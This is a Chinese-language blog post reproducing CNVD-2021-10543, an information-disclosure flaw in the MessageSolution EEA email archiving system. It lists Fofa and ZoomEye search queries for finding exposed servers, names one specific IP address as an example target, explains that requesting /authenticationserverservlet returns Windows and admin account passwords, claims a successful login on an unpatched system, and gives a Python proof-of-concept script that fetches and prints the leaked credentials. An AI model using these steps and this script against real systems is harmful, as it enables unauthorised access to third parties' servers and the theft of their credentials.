CNVD-2021-10543 MessageSolution 邮件归档系统EEA 漏洞复现


一 fofa寻找目标

Fofa搜索:

title=”MessageSolution Enterprise Email Archiving (EEA)”

title=”MessageSolution”

upload successful

钟馗之眼搜索:

title:”MessageSolution”

二 打开https://IP/indexcommon.jsp

upload successful

三 访问/authenticationserverservlet目录直接获取Windows服务器账号密码跟后台账号密码

例如:https://58.67.197.253/authenticationserverservlet

upload successful

四 用账号密码登录成功,至今还未修复

upload successful
如果别人也在登录,会显示登录失败

五 cnvd-2021-10543.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
import requests
import sys
import random
import re
from requests.packages.urllib3.exceptions import InsecureRequestWarning

def title():
print('+------------------------------------------')
print('+ \033[34mVersion: MessageSolution 企业邮件归档管理系统EEA \033[0m')
print('+ \033[36m使用格式: python3 poc.py \033[0m')
print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m')
print('+------------------------------------------')


def POC_1(target_url):
vuln_url = target_url + "/authenticationserverservlet/"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
}
try:
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)
if response.status_code == 200 and "administrator" in response.text:
print("\033[32m[o] 目标 {} 存在信息泄露 响应为:{}\033[0m".format(target_url, response.text))
else:
print("\033[31m[x] 目标 {}不存在漏洞 \033[0m".format(target_url))
except Exception as e:
print("\033[31m[x] 目标 {} 请求失败 \033[0m".format(target_url))




if __name__ == "__main__":
title()
target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
POC_1(target_url)

执行结果
upload successful


文章作者: thirteensummer
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 thirteensummer !
 上一篇
Hello 暗影LXH十三先生 Hello 暗影LXH十三先生
hexo常用命令笔记hexonpm install hexo -g #安装npm update hexo -g #升级hexo init #初始化 简写hexo n “我的博客” == hexo new “我的博客” #新建文章hexo p
2021-03-23 thirteensummer
下一篇 
kerberos之猥琐攻击 kerberos之猥琐攻击
2021-03-23 thirteensummer
  目录